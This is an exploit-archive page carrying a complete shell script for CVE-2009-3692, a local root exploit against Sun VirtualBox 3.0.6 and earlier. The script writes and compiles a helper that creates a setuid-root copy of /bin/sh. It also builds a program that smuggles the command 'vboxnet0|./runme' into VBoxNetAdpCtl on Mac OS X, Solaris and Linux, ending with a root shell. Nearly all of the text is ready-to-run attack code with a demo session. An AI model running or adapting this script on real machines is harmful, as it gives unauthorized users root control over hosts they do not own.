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Sun VirtualBox <= 3.0.6 privilege escalation
============================================ Sun VirtualBox <= 3.0.6 privilege escalation ============================================ # Title: Sun VirtualBox <= 3.0.6 privilege escalation # CVE-ID: () # OSVDB-ID: () # Author: prdelka # Published: 2009-10-17 # Verified: yes view source print? #!/bin/sh # CVE-2009-3692 Sun VirtualBox <= 3.0.6 local root exploit # ======================================================== # Exploits popen() meta char shell injection vulnerability # in Sun VirtualBox. # # E.g. # admin@sundevil:~/test$ id # uid=101(admin) gid=10(staff) groups=10(staff) # admin@sundevil:~/test$ uname -a # SunOS sundevil 5.11 snv_111b i86pc i386 i86pc Solaris # admin@sundevil:~/test$ ./prdelka-vs-SUN-virtualbox.sh # [ Sun VirtualBox <= 3.0.6 OSX/SOL/LINUX local root exploit # [ No path provided, will attempt to exploit system default # [ Places a root shell in ./sh if succesful # [ Detected a SunOS target # [ Detected SunOS is x86 platform # ifconfig: add: bad address # [ Trying for root shell. # # id # uid=101(admin) gid=10(staff) euid=0(root) egid=0(root) groups=10(staff) # # -- prdelka cat >> runme.c << EOF #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> int main(int argc, char* argv[]){ FILE *from, *to; int fd; char ch; setuid(0); setgid(0); from = fopen("/bin/sh","rb"); to = fopen("./sh","wb"); while(!feof(from)){ ch = fgetc(from); if(!feof(from)) fputc(ch, to); } fclose(from); fclose(to); fd = open("./sh",O_RDWR); fchown(fd,0,0); fchmod(fd,S_IRWXU|S_IRWXG|S_IRWXO|S_ISUID|S_ISGID); close(fd); exit(0); } EOF gcc runme.c -o runme 2>/dev/null rm -rf runme.c cat >> exploit.c << EOF /* CVE-2009-3692 VirtualBox VBoxNetAdpCtl Privilege Escalation =========================================================== Local exploit for the popen() meta character shell injection vulnerability that permits a malicious user to obtain root privileges on the VirtualBox host machine. This exploit relies on the "/bin/sh" binary on the host as being a non-privilege dropping shell such as zsh, this is not always the OS default setting. Most modern platforms do not have a /bin/sh that retains privileges by default however Solaris still seems to! You can provide an arguement to the VBoxNetAdpCtl binary path or alternatively this exploit detects local host platform and runs with common or default installation location. */ #include <stdio.h> #include <stdlib.h> #include <sys/utsname.h> int main(int argc,char* argv[]) { char *env[] = {NULL}; int platform, machine = 0; struct utsname* sysdetail = malloc(sizeof(struct utsname)); printf("[ Sun VirtualBox <= 3.0.6 OSX/SOL/LINUX local root exploit\n"); if(argc > 1){ printf("[ Trying %s\n", argv[1]); execle(argv[1],argv[1],"vboxnet0|./runme","1::2",NULL,env); exit(0); } else{ printf("[ No path provided, will attempt to exploit system default\n"); } printf("[ Places a root shell in ./sh if succesful\n"); uname(sysdetail); if(!strncmp("Darwin",sysdetail->sysname,strlen("Darwin"))) platform = 1; if(!strncmp("SunOS",sysdetail->sysname,strlen("SunOS"))) platform = 2; if(!strncmp("Linux",sysdetail->sysname,strlen("Linux"))) platform = 3; switch(platform){ case 1: printf("[ Detected a Mac OS X target\n"); execle("/Applications/VirtualBox.app/Contents/MacOS/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env); break; case 2: printf("[ Detected a SunOS target\n"); if(!strncmp("i86pc",sysdetail->machine,strlen("i86pc"))){ printf("[ Detected SunOS is x86 platform\n"); execle("/opt/VirtualBox/i386/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env); } else{ printf("[ Guessing SunOS is amd64 platform\n"); execle("/opt/VirtualBox/amd64/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env); } break; case 3: printf("[ Detected a Linux target\n"); execle("/opt/VirtualBox/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env); break; default: printf("[ Unknown OSE target. Try ./%s <path>/VBoxNetAdpCtl\n",argv[0]); break; } exit(0); } EOF gcc exploit.c -o exploit 2>/dev/null rm -rf exploit.c if [ $1 ] then ./exploit $1 else ./exploit fi echo [ Trying for root shell. ./sh # 0day.today [2024-11-15] #